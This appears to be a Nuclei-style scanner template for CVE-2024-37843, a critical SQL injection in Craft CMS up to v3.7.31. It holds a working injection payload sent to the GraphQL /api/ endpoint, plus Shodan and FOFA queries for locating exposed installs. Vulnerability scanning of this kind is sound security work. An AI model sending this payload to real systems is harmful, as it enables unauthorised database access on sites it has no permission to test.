Craft CMS <=v3.7.31 - SQL Injection

id: CVE-2024-37843

info:
  name: Craft CMS <=v3.7.31 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
  reference:
    - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql
    - https://github.com/gsmith257-cyber/CVE-2024-37843-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-37843
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39447
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:"craftcms"
      - http.favicon.hash:"-47932290"
      - "X-Powered-By: Craft CMS"
    fofa-query:
      - body=craftcms
      - icon_hash=-47932290
    publicwww-query: craftcms
  tags: cve,cve2024,craftcms,sqli

variables:
  matcher: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /api/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type:application/json

        {"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "General error: 1105 XPATH syntax error: '\\n{{matcher}}"

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a00463044022002dca2f2b0925cbe4564e9abdf3f70b914472fcecde703539b7834ad0d4c8aea02207c9493c976a30ef2f6ad0e7be9a8c8edd366b67477a88c89ad7c574e50005def:922c64590222798bb761d5b6d8e72950